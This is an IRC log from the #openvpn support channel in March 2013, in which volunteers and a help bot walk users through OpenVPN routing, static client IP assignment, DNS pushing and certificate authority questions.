14:34 < timmmaaaayyy> anything else i can provide that might help troubleshoot?
14:34 < pekster> You can ping the client VPN IP from the server?
14:35 < pekster> 10.8.0.13 in that example
14:35 < pekster> (ie: last paste)
14:37 < timmmaaaayyy> yes that works
14:37 < timmmaaaayyy> got it working end to end
14:38 < pekster> What OS is the server?
14:38 < timmmaaaayyy> i needed to enable routing and remote access service on the win7 machine....just the registry hack wasn't enough
14:38 < timmmaaaayyy> the server is debian
14:38 < timmmaaaayyy> thank you all very much for the help!
14:38 < pekster> Ah, right. Honestly, you'll have a better experience if your client isn't windows
14:38 < pekster> A $40 router is better suited to run openvpn that Windows, sadly
14:38 < pekster> than*
14:39 < pekster> At least if you want to do stuff like expose a client LAN and possibly do filtering/firewalling on that traffic
14:40 < jzaw> pekster, hehe im using a £10 router .... and its doing admirably !
14:41 < timmmaaaayyy> yes i totally understand. windows is not optimal, but it's the only option in this case. not that i have it....i'll only need it for about 30 more minutes. thankfully
14:41 < jzaw> ipv4 and ipv6 down the vpn
14:41 < jzaw> and clients behind it all on public ips both 4 and 6
14:56 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn
14:58 -!- timmmaaaayyy [~timmmaaaa@cpe-68-175-79-100.nyc.res.rr.com] has left #openvpn []
15:09 -!- Cpt_Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has joined #openvpn
15:13 -!- kubbing [~kubbing@89.177.146.18] has quit [Ping timeout: 264 seconds]
15:25 -!- cyberspace- [20253@ninthfloor.org] has quit [Read error: Connection reset by peer]
15:26 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn
15:27 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn
15:30 -!- p3rror [~mezgani@41.140.196.35] has quit [Read error: Operation timed out]
15:34 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving]
15:35 -!- master_of_master [~master_of@p4FF24F0C.dip.t-dialin.net] has joined #openvpn
15:39 -!- master_o1_master [~master_of@p4FF24D0B.dip.t-dialin.net] has quit [Ping timeout: 248 seconds]
16:01 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
16:05 -!- Hellasaurus [~Hellcore@cpc26-soli5-2-0-cust494.19-1.cable.virginmedia.com] has joined #openvpn
16:06 < Hellasaurus> !welcome
16:06 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample
16:06 <@vpnHelper> !forum !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict)
16:06 < Hellasaurus> !redirect
16:06 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart:
16:06 <@vpnHelper> http://ircpimps.org/redirect.png
16:07 < Hellasaurus> !dns
16:07 <@vpnHelper> "dns" is (#1) Level3 open recursive DNS server at 4.2.2.[1-6] or (#2) Google open recursive DNS server at 8.8.8.8 / 8.8.4.4 or (#3) you might be looking for !pushdns
16:07 < Hellasaurus> !pushdns
16:07 <@vpnHelper> "pushdns" is (#1) push "dhcp-option DNS a.b.c.d" to push dns to the client or (#2) http://thread.gmane.org/gmane.network.openvpn.user/25139/focus=25147 see that mail archive for some info on pushing dns or (#3) http://article.gmane.org/gmane.network.openvpn.user/25149 for a perm fix via regedit or (#4) in unix you'll use the update-resolv-conf script or (#5) also
16:07 <@vpnHelper> http://comments.gmane.org/gmane.network.openvpn.user/31975 reports --register-dns as fixing their problems pushing DNS to windows 7
16:14 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
16:25 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 258 seconds]
16:37 < Hellasaurus> !howto
16:37 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror
16:46 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Ping timeout: 255 seconds]
16:50 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn
16:57 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
17:05 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 245 seconds]
17:06 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn
17:18 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep]
17:27 -!- Hellasaurus [~Hellcore@cpc26-soli5-2-0-cust494.19-1.cable.virginmedia.com] has quit []
17:35 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
17:39 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer]
17:41 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 245 seconds]
17:44 -!- kubbing [~kubbing@89.177.146.18] has quit [Remote host closed the connection]
17:45 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 264 seconds]
17:48 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn
18:06 -!- brute11k [~brute@89.249.231.71] has quit [Quit: Leaving.]
18:14 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 258 seconds]
18:16 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn
18:28 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
18:30 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 245 seconds]
18:33 -!- s7r [~s7r@openvpn/user/s7r] has left #openvpn []
18:40 -!- Cpt_Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has quit []
18:45 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn
18:55 -!- [fred] [fred@konfuzi.us] has quit [Ping timeout: 240 seconds]
18:58 -!- [fred] [fred@konfuzi.us] has joined #openvpn
19:01 -!- master_o1_master [~master_of@p4FF2433B.dip.t-dialin.net] has joined #openvpn
19:04 -!- master_of_master [~master_of@p4FF24F0C.dip.t-dialin.net] has quit [Ping timeout: 264 seconds]
19:04 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
19:07 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn
19:27 -!- djshotglass [~Guest7552@out-bc-149.wireless.telus.com] has joined #openvpn
19:28 < djshotglass> i have 3 vpn clients sharing a cert how do i give them each static ip
19:30 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 240 seconds]
19:33 -!- erry [erry@freenode/staff/erry] has quit [Quit: Segmentation fault]
19:33 -!- erry_ [erry@freenode/staff/erry] has joined #openvpn
19:35 -!- erry_ is now known as erry
19:36 < pekster> djshotglass: You don't. Or write some creative --client-connect script to use another definable attribute to somehow apply your own magic to uniquely identify each user (source IP, etc.) That's a poor solution, IMO. Optionally, also require user/pass auth in addition to the same cert and use the username. The correct way to do this is issue unique certs per user.
19:37 < djshotglass> hmm ok
19:38 < pekster> You can look at the --ifconfig-pool-persist option, but that is notably not the same as static IPs and shouldn't be used if that's what you really want. See:
19:38 < pekster> !ipp
19:38 <@vpnHelper> "ipp" is (#1) the option --ifconfig-pool-persist ipp.txt does NOT create static ips or (#2) Note that the entries in this file are treated by OpenVPN as suggestions only, based on past associations between a common name and IP address. They do not guarantee that the given common name will always receive the given IP address. If you want guaranteed assignment, see !iporder and !static
19:39 < djshotglass> !iporder
19:39 <@vpnHelper> "iporder" is (#1) OpenVPN's internal client IP address selection algorithm works as follows: 1 -- Use --client-connect script generated file for static IP (first choice). or (#2) Use --client-config-dir file for static IP (next choice) !static for more info or (#3) Use --ifconfig-pool allocation for dynamic IP (last choice) or (#4) if you use --ifconfig-pool-persist see !ipp
19:39 < djshotglass> !static
19:39 <@vpnHelper> "static" is (#1) use --ifconfig-push in a ccd entry for a static ip for the vpn client or (#2) example in net30 (default): ifconfig-push 10.8.0.6 10.8.0.5 example in subnet (see !topology) or tap (see !tunortap): ifconfig-push 10.8.0.5 255.255.255.0 or (#3) also see !ccd and !iporder
19:53 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 256 seconds]
20:09 -!- Guest75521 [~Guest7552@out-bc-149.wireless.telus.com] has joined #openvpn
20:11 -!- djshotglass [~Guest7552@out-bc-149.wireless.telus.com] has quit [Ping timeout: 252 seconds]
20:12 -!- Guest75521 [~Guest7552@out-bc-149.wireless.telus.com] has quit [Client Quit]
20:23 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn
20:23 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection]
20:31 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn
20:40 -!- kubbing [~kubbing@89.177.146.18] has quit [Remote host closed the connection]
20:41 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn
21:58 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection]
22:06 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer]
22:06 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn
22:53 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 258 seconds]
23:09 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Read error: Connection reset by peer]
23:22 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn
23:23 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer]
23:40 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 256 seconds]
23:56 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn
--- Day changed Mon Mar 18 2013
01:09 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn
01:14 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn
01:34 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
02:02 < jzaw> !ccd
02:02 <@vpnHelper> "ccd" is (#1) entries that are basically included into server.conf, but only for the specified client based on common-name. use --client-config-dir to enable it, then put the config options for the client in /common-name or (#2) the ccd file is parsed each time the client connects.
02:07 -!- hatschi [~marvin@dslb-178-010-198-195.pools.arcor-ip.net] has joined #openvpn
02:16 -!- xbanux [~xbanux@triband-mum-59.182.156.172.mtnl.net.in] has joined #openvpn
02:22 -!- Orbi [~opera@anon-186-54.vpn.ipredator.se] has joined #openvpn
02:25 -!- mustu__ [~maan@119.63.130.93] has quit [Quit: Lost terminal]
02:27 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
02:33 -!- ocei3ko [~NA@unaffiliated/ocei3ko] has joined #openvpn
02:33 < ocei3ko> Hello, I'm trying to use openvpn on a wifi network that uses a 10.x address, and openvpn does not add routes
02:33 < ocei3ko> Why?
02:34 < ocei3ko> Doesn't even add tun0
02:39 -!- thinkHell [~Hell@85.15.47.27] has joined #openvpn
02:46 < ocei3ko> Is there a configuration option I should be using?
02:56 -!- ocei3ko [~NA@unaffiliated/ocei3ko] has quit [Ping timeout: 245 seconds]
02:57 -!- ocei3ko [~NA@unaffiliated/ocei3ko] has joined #openvpn
02:57 < ocei3ko> Anyone answer my question above?
02:59 -!- master_of_master [~master_of@p4FF24ED5.dip.t-dialin.net] has joined #openvpn
02:59 < jzaw> ocei3ko, pastebin your server and client confs
02:59 < jzaw> ifconfig output
02:59 < jzaw> and ip route show output
03:00 -!- master_o1_master [~master_of@p4FF2433B.dip.t-dialin.net] has quit [Read error: Operation timed out]
03:00 < ocei3ko> Can't do atm, not on said computer
03:01 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn
03:03 < jzaw> difficult to diagnose anything then
03:06 < ocei3ko> Right, and you have no guesses?
03:07 < jzaw> i guess you have an error in some setting
03:07 < jzaw> and i hazard a guess im 100% right
03:08 < ocei3ko> jzaw, http://pastebin.com/Q3GQq9pV
03:08 < ocei3ko> client config
03:08 -!- xbanux [~xbanux@triband-mum-59.182.156.172.mtnl.net.in] has quit [Read error: Connection reset by peer]
03:08 < ocei3ko> It works on everything but this one public wifi network
03:09 -!- xbanux [~xbanux@triband-mum-59.182.145.108.mtnl.net.in] has joined #openvpn
03:11 <@EugeneKay> Logs would be helpful
03:11 <@EugeneKay> If I had to guess, it's a subnet conflict.
03:12 < ocei3ko> How would I fix the conflict?
03:12 < ocei3ko> Both try to use 10.*, so it seems to be so
03:13 < ocei3ko> But openvpn doesn't even bring up tun0
03:15 < jzaw> EugeneKay, can i not get client.conf to execute up.sh ? doesn't seem to
03:16 <@EugeneKay> The startup script is handled by your init script
03:16 <@EugeneKay> What OS?
03:17 < jzaw> debian wheezy ....
03:17 < jzaw> no i mean a custom script .... anyname.sh
03:17 < jzaw> which i keep in /etc/openvpn
03:17 < jzaw> the server has one and that executes fine
03:17 < jzaw> chmod +x done
03:17 < jzaw> etc
03:18 < jzaw> i can manually run it
03:19 < jzaw> script-security 2
03:19 < jzaw> set
03:25 -!- ocei3ko [~NA@unaffiliated/ocei3ko] has quit [Read error: Connection reset by peer]
03:31 < jzaw> correction EugeneKay its openwrt im running client on
03:33 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 248 seconds]
03:40 -!- _ddlk_ [~ddlk@183.246.96.215] has joined #openvpn
03:41 -!- _ddlk_ [~ddlk@183.246.96.215] has quit []
03:41 -!- ddlk [~ddlk@183.246.96.215] has joined #openvpn
03:42 < ddlk> Anyone has experience with openvpn and static key?
03:42 < ddlk> I can ping the server, but cannot access internet
03:49 <@EugeneKay> jzaw - you're referring to a client-connect script, then?
03:50 <@EugeneKay> Or rather, a connect
03:50 <@EugeneKay> !logs
03:50 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it and select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile
03:51 <@EugeneKay> !redirect
03:51 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart:
03:51 <@vpnHelper> http://ircpimps.org/redirect.png
03:51 <@EugeneKay> ddlk - follow the chart ^
03:58 -!- corretico [~luis@190.211.93.38] has quit [Ping timeout: 240 seconds]
03:59 -!- brute11k [~brute@89.249.231.66] has joined #openvpn
04:05 < ddlk> wow, nice chart, trying it, thanks :D
04:06 -!- zamba [marius@flage.org] has quit [Ping timeout: 245 seconds]
04:06 -!- kubbing [~kubbing@c-006.certicon.cz] has joined #openvpn
04:14 -!- zz_AsadH is now known as AsadH
04:29 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn
04:29 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer]
04:31 < Rienzilha> hmm
04:31 < Rienzilha> how hard is it to distribute an openvpn configuration (and possibly, initiate an install of openvpn) with another software package?
04:31 < Rienzilha> and will I run into licensing issues?
04:32 -!- dpecka [~dpecka@193.165.171.107] has joined #openvpn
04:32 < dpecka> hello
04:32 < Rienzilha> (the package in question is open source, but I'm not sure about its license)
04:33 < dpecka> i'd like to ask for something .. i have openvpn, it's working great .. i have no deep experience and knowledge with PKI infra .. i was always using self-signed certs .. when i will configure an openvpn server to use a server.key signed by CA which i don't own, the server will have to periodically check on remote CA, if the key is valid via crl ?
04:34 -!- ddlk [~ddlk@183.246.96.215] has quit [Read error: Connection reset by peer]
04:36 -!- ddlk [~ddlk@183.246.96.215] has joined #openvpn
04:37 <@EugeneKay> The general wisdom is do not use public/commercial CAs
04:37 <@EugeneKay> If you do, set up regular CRL downloading and strong CN checks
04:37 < dpecka> EugeneKay: no, not public but one which is owned by my employer
04:38 <@EugeneKay> Then there's less worry there - you can trust the CA quite a bit
04:41 < dpecka> EugeneKay: hmm .. it's rather a political problem ... i don't want to be fully responsible for the keys' security
04:42 < dpecka> EugeneKay: the server was using until now exclusively by our devels, now they want to sell something from inside to customer and let them enter
04:42 < dpecka> **the server has been used
04:42 <@EugeneKay> Blah
04:43 -!- ddlk [~ddlk@183.246.96.215] has quit []
04:43 <@EugeneKay> I would set up a (possibly intermediate) CA exclusively for handling this task
04:44 < dpecka> so i want to get rid of PKI/certs responsibility .. the ca of our company is maintained by our internal sysadmins who can generate keys however they are unable to administer my openvpn, so the plan is that i will import new server.key to my server and will distribute new clients generated with the new set of keys
04:49 <@EugeneKay> Sounds sane
05:02 -!- hatschi_ [~marvin@dslb-178-010-198-195.pools.arcor-ip.net] has joined #openvpn
05:03 -!- hatschi [~marvin@dslb-178-010-198-195.pools.arcor-ip.net] has quit [Ping timeout: 260 seconds]
05:03 -!- hatschi_ is now known as hatschi
05:06 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Quit: WeeChat 0.3.8]
05:07 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn
05:18 -!- CEnnis91 [uid3543@gateway/web/irccloud.com/x-lmbdyojognqqrrqo] has quit [Ping timeout: 264 seconds]
05:18 -!- sedulous [~sedulous@unaffiliated/sed/x-0159859] has quit [Ping timeout: 264 seconds]
05:19 -!- sedulous [~sedulous@unaffiliated/sed/x-0159859] has joined #openvpn
05:21 -!- newbie|3 [~tjz@bb219-74-189-54.singnet.com.sg] has quit [Ping timeout: 240 seconds]
05:27 -!- dazo_afk is now known as dazo
05:33 -!- thinkHell [~Hell@85.15.47.27] has quit [Ping timeout: 258 seconds]
05:46 -!- y4h0 [~yavor@78.128.23.17] has quit [Ping timeout: 255 seconds]
05:52 -!- hatschi [~marvin@dslb-178-010-198-195.pools.arcor-ip.net] has quit [Ping timeout: 260 seconds]
05:55 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Quit: WeeChat 0.3.8]
05:57 -!- hatschi [~marvin@dslb-178-010-198-195.pools.arcor-ip.net] has joined #openvpn
06:18 -!- master_o1_master [~master_of@p4FF24BF8.dip.t-dialin.net] has joined #openvpn
06:21 -!- master_of_master [~master_of@p4FF24ED5.dip.t-dialin.net] has quit [Ping timeout: 258 seconds]
06:22 < jzaw> ping pekster
06:27 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn
06:37 -!- Colttt [~stefan.kr@cpe-001a8c164de9.ip-pool.rftonline.net] has joined #openvpn
06:37 < Colttt> hello everybody..
06:38 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 255 seconds]
06:38 < Colttt> i have a problem, on one computer i got an error when i connect to our server: MANAGEMENT: listen() failed: Permission denied (WSAEACCES) (errno=10013)
06:39 -!- CEnnis91 [uid3543@gateway/web/irccloud.com/x-vqvgtzvvbbbougmj] has joined #openvpn
06:39 < Colttt> i use windows7 64bit
06:39 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
06:40 < Colttt> and openvpn version 2.1.1
06:46 -!- xbanux [~xbanux@triband-mum-59.182.145.108.mtnl.net.in] has quit [Remote host closed the connection]
06:47 -!- xbanux [~xbanux@triband-mum-59.182.145.108.mtnl.net.in] has joined #openvpn
06:48 -!- zamba [marius@flage.org] has joined #openvpn
07:14 -!- kubbing_ [~kubbing@c-006.certicon.cz] has joined #openvpn
07:14 -!- kubbing [~kubbing@c-006.certicon.cz] has quit [Ping timeout: 264 seconds]
07:19 -!- novaflash is now known as novaflash_away
07:19 -!- novaflash_away is now known as novaflash
07:25 -!- Diffen [~diffen@80.78.212.242] has joined #openvpn
07:26 -!- kubbing_ [~kubbing@c-006.certicon.cz] has quit [Remote host closed the connection]
07:27 -!- kubbing [~kubbing@c-006.certicon.cz] has joined #openvpn
07:30 -!- Colttt [~stefan.kr@cpe-001a8c164de9.ip-pool.rftonline.net] has left #openvpn []
07:34 -!- Diffen [~diffen@80.78.212.242] has quit [Quit: This computer has gone to sleep]
07:36 -!- Diffen [~diffen@80.78.212.242] has joined #openvpn
07:37 -!- tjz [~tjz@unaffiliated/tjz] has joined #openvpn
07:41 -!- newbie|2 [~tjz@67.228.240.11-static.reverse.softlayer.com] has joined #openvpn
07:44 -!- tjz [~tjz@unaffiliated/tjz] has quit [Ping timeout: 245 seconds]
07:58 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn
07:58 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn
08:06 -!- sisar [~chatzilla@64.62.201.17] has quit [Quit: ChatZilla 0.9.90 [Firefox 19.0.2/20130307023931]]
08:24 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Read error: Operation timed out]
08:27 -!- newbie|3 [~tjz@bb219-74-189-54.singnet.com.sg] has joined #openvpn
08:30 -!- newbie|2 [~tjz@67.228.240.11-static.reverse.softlayer.com] has quit [Ping timeout: 246 seconds]
08:31 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn
08:33 -!- hatschi [~marvin@dslb-178-010-198-195.pools.arcor-ip.net] has quit [Quit: hatschi]
08:40 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 258 seconds]
08:52 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn
08:58 -!- fluter [~fluter@fedora/fluter] has joined #openvpn
09:02 -!- MaynardWaters [~asdfjkl@c-71-238-30-69.hsd1.mi.comcast.net] has joined #openvpn
09:03 < MaynardWaters> hello, I am trying to figure out why my openvpn on ubuntu does not act like my openvpn on windows. When I use the openvpn on ubuntu, it does not let me access the rest of the internet, but restricts me to only getting to the resources housed within that network. do I need a proxy to get back to the internet?
09:03 < dpecka> MaynardWaters: depends .. what tool do you use as a client application ?
09:04 < MaynardWaters> in windows I am using the .exe 09:04 < dpecka> cool story, but i'm asking what client software are u using in ubuntu 09:04 < MaynardWaters> in ubuntu I have tried a number of client apps, the one that works the best (still not as good as the windows one) is built into ubuntu's network-manager applet 09:05 * MaynardWaters is opening up the software center to give specifics 09:05 < dpecka> MaynardWaters: then please try to reproduce your issues with native openvpn software 09:05 -!- kubbing [~kubbing@c-006.certicon.cz] has quit [Remote host closed the connection] 09:06 < MaynardWaters> dpecka, the issue was worse when i tried the openvpn cli 09:06 < MaynardWaters> the halfway good option is network-manager-openvpn-gnome 09:07 < MaynardWaters> if you prefer and it is easier for you to help, I will go back to the openvpn cli 09:07 < dpecka> MaynardWaters: do you realize, that both of them are plainly scripted to use openvpn backend as i suggested to do directly ? 09:07 -!- csaba [~csaba@195.199.154.25] has joined #openvpn 09:07 < MaynardWaters> I did not realize this, but I suspected such 09:07 < csaba> hello 09:08 < dpecka> MaynardWaters: i dunno what's openvpn cli but you should use directly openvpn binary 09:08 < MaynardWaters> dpecka: when i say openvpn cli, i just mean I type "sudo openvpn --config file.ovpn" 09:08 < MaynardWaters> is that the same as what you mean by using the openvpn binary? 
09:09 -!- kubbing [~kubbing@c-006.certicon.cz] has joined #openvpn 09:09 < csaba> I found this website: https://www.secure-computing.net/ 09:09 <@vpnHelper> Title: SCN: SCN (at www.secure-computing.net) 09:09 < csaba> http://www.secure-computing.net/wiki/index.php?title=Special:Upload&wpDestFile=Scn.zip 09:09 <@vpnHelper> Title: Login required - Secure Computing Wiki (at www.secure-computing.net) 09:10 < csaba> but can not download the mentioned file 09:10 < csaba> scn.zip for the openldap schema 09:10 < dpecka> MaynardWaters: http://susepaste.org/view/raw/83690841 << use config like this (refer please to docs) and openvpn .. it will work 09:10 < csaba> am I at the right place? 09:11 < csaba> can you guys help me? 09:13 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 258 seconds] 09:15 < csaba> anyone? 09:15 -!- Diffen [~diffen@80.78.212.242] has quit [Quit: This computer has gone to sleep] 09:16 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 09:16 -!- Diffen [~diffen@80.78.212.242] has joined #openvpn 09:19 -!- xbanux [~xbanux@triband-mum-59.182.145.108.mtnl.net.in] has quit [Ping timeout: 245 seconds] 09:19 -!- ihptru [~ihptru@164.138.25.4] has quit [Ping timeout: 260 seconds] 09:20 -!- HectorBarbossa [uid7850@gateway/web/irccloud.com/x-zxcgkocqnpwnljgq] has quit [Ping timeout: 258 seconds] 09:21 -!- ihptru [~ihptru@2a02:2770::21a:4aff:fef3:cdbb] has joined #openvpn 09:21 < csaba> vpnHelper: can someone point me to where I can get help with OpenLDAP/Authentication 09:22 < csaba> please, there is mentioned on this website a scn.zip file for host verification but it is a wrong url 09:22 < csaba> can not download it, 09:23 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 09:34 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Quit: Leaving] 09:35 -!- xbanux [~xbanux@triband-mum-59.182.145.108.mtnl.net.in] has joined #openvpn 09:37 -!- speed_racer8
[~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 09:37 -!- pelle2 [~palle@178-132-74-156.cust.azirevpn.net] has left #openvpn [] 09:45 -!- defswork [~andy@141.0.50.105] has joined #openvpn 09:50 -!- defswork [~andy@141.0.50.105] has quit [Remote host closed the connection] 09:51 -!- xbanux [~xbanux@triband-mum-59.182.145.108.mtnl.net.in] has quit [Remote host closed the connection] 09:52 -!- xbanux [~xbanux@triband-mum-59.182.145.108.mtnl.net.in] has joined #openvpn 10:03 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 10:07 -!- kls [~kls@adslc3e4e579.fixip.t-online.hu] has joined #openvpn 10:07 < kls> hello! anyone around for a bit of troubleshooting? i am trying to install openvpn in a vps and have been failing all day. 10:10 -!- Orbi [~opera@anon-186-54.vpn.ipredator.se] has left #openvpn [] 10:11 -!- defswork [~andy@141.0.50.105] has joined #openvpn 10:13 -!- kls [~kls@adslc3e4e579.fixip.t-online.hu] has quit [] 10:14 -!- kls [~kls@adslc3e4e579.fixip.t-online.hu] has joined #openvpn 10:15 -!- xbanux [~xbanux@triband-mum-59.182.145.108.mtnl.net.in] has quit [Remote host closed the connection] 10:15 -!- kls [~kls@adslc3e4e579.fixip.t-online.hu] has quit [Remote host closed the connection] 10:15 -!- xbanux [~xbanux@triband-mum-59.182.144.193.mtnl.net.in] has joined #openvpn 10:18 -!- fluter [~fluter@fedora/fluter] has quit [Quit: Leaving] 10:21 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 264 seconds] 10:22 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 10:28 -!- xbanux [~xbanux@triband-mum-59.182.144.193.mtnl.net.in] has quit [Read error: Connection reset by peer] 10:29 -!- xbanux [~xbanux@triband-mum-59.182.168.246.mtnl.net.in] has joined #openvpn 10:29 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Quit: leaving] 10:52 < jzaw> anyone set up a server (and client) purely on ipv6? 
10:52 < jzaw> not sending ipv6 down an existing ipv4 tunnel but actually an ipv6 tunnel 10:53 < jzaw> potentially and probably routed 10:54 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has joined #openvpn 10:55 -!- Diffen [~diffen@80.78.212.242] has quit [Quit: This computer has gone to sleep] 10:58 -!- xbanux [~xbanux@triband-mum-59.182.168.246.mtnl.net.in] has quit [Read error: Connection reset by peer] 10:59 -!- xbanux [~xbanux@triband-mum-59.182.161.92.mtnl.net.in] has joined #openvpn 10:59 -!- abec0_ is now known as abec0 11:10 -!- brute11k [~brute@89.249.231.66] has quit [Ping timeout: 264 seconds] 11:12 -!- Dave2 [~Dave2@freenode/staff/dave2] has joined #openvpn 11:13 -!- brute11k [~brute@89.249.235.173] has joined #openvpn 11:16 -!- HectorBarbossa [uid7850@gateway/web/irccloud.com/x-wclmhmpvxmgxurke] has joined #openvpn 11:19 -!- kubbing [~kubbing@c-006.certicon.cz] has quit [Ping timeout: 246 seconds] 11:21 <@ecrist> csaba: did you ever get things figured out? 11:22 <@EugeneKay> jzaw - should work just fine in 2.3 with --server-ipv6 11:22 <@EugeneKay> Or 